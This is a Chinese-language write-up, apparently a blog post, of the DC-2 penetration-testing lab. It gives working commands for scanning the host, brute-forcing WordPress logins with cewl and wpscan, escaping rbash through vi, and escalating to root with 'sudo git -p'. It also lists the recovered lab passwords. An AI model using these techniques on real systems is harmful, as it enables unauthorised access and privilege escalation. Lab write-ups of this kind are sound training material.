DC-2靶场渗透测试实验整理

目录

一、主机存活探测

二、主机端口探测

三、漏洞探测和利用

(一)第一个flag

(二)第二个flag

1. cewl生成密码字典

2. wpscan基于字典爆破

(三)第三个flag

1. rbash逃逸

(四)第四个flag

四、提权

(一)最终flag


一、主机存活探测

        arp-scan -l 进行ARP扫描,排除其他设备IP,192.168.101.69是DC-2的IP地址。

二、主机端口探测

        先用masscan快速扫描开放的端口:
masscan --rate=100000 -p 1-65535 192.168.101.69
        可以看到扫描到了80和7744两个端口
        使用nmap扫描开放端口的指纹等信息:
nmap -T4 -sV -p80,7744 -A 192.168.101.69
        可以看到扫描出几个信息:
  1. 80端口运行的http服务,版本httpd 2.4.10
  2. http上运行的web服务重定向到了http://dc-2
  3. 7744端口运行的是openssh服务,版本6.7p1
        先修改/etc/hosts文件,将192.168.101.69对应到dc-2,重新进行nmap扫描:
        这次发现新的信息:http上运行了wordpress 4.7.10

三、漏洞探测和利用

        由于发现网站框架使用的wordpress,本次测试使用wpscan进行。

(一)第一个flag

        打开 http://dc-2/ ,发现第一个flag1

(二)第二个flag

1. cewl生成密码字典

        根据flag1的提示,下一步需要使用cewl对网站进行信息收集生成密码字典,具体做法如下:
cewl http://dc-2 -w wordlist.txt

2. wpscan基于字典爆破

        现在有了网站的密码字典,没有账号,所以需要使用wpscan对账号进行枚举:
wpscan --url http://dc-2/ -e u
        发现了三个账号:admin、jerry、tom,再使用wpscan对发现的3个账号分别进行密码比对
        admin账号,没有发现匹配的密码。
wpscan --url http://dc-2 -U admin -P wordlist.txt
        jerry账号, jerry账号匹配到了密码:adipiscing
​wpscan --url http://dc-2 -U jerry -P wordlist.txt
        tom账号,tom账号匹配到了密码:parturient
wpscan --url http://dc-2 -U tom -P wordlist.txt
        
        既然已经得到了jerry和tom的密码,没说的,对wordpress熟悉的话直接登陆,如果不熟悉,还是需要进行目录探测,本文省略目录探测的步骤。
        登陆网址 http://dc-2/wp-login.php ,输入账号jerry,密码adipiscing,进入后台后浏览下网站上有的页面,很快就找到flag2

(三)第三个flag

        使用jerry和tom的账号密码尝试登陆ssh,这里注意,ssh的端口改成了7744。
1. jerry登陆不进ssh
2. tom可以登陆ssh,如下:
root@kali:~# ssh tom@192.168.101.69 -p 7744
tom@192.168.101.69's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
tom@DC-2:~$
        发现flag3
tom@DC-2:~$ ls
flag3.txt  usr
        cat查看flag3.txt,遇到rbash限制,如下:
tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found
vi flag3.txt,内容如下:
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
or old Tom is always running after

1. rbash逃逸

        为了绕过rbash限制,需要进行rbash逃逸操作,具体如下:
vi flag3.txt
输入:set  shell=/bin/sh回车
        
输入:shell回车
        逃逸成功。
        设置命令路径变量:
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
        再用cat flag3.txt,命令执行成功:

(四)第四个flag

        flag3提示su到jerry,利用前面爆破到的密码进入jerry,如下:
可以得到jerry家目录下的flag4

四、提权

(一)最终flag

        flag4提示需要用到git提权,具体操作如下:
jerry@DC-2:~$ sudo git -p
输入!/bin/sh提权到root
cd /root
ls
        获得最终flag
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

見贤思齊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值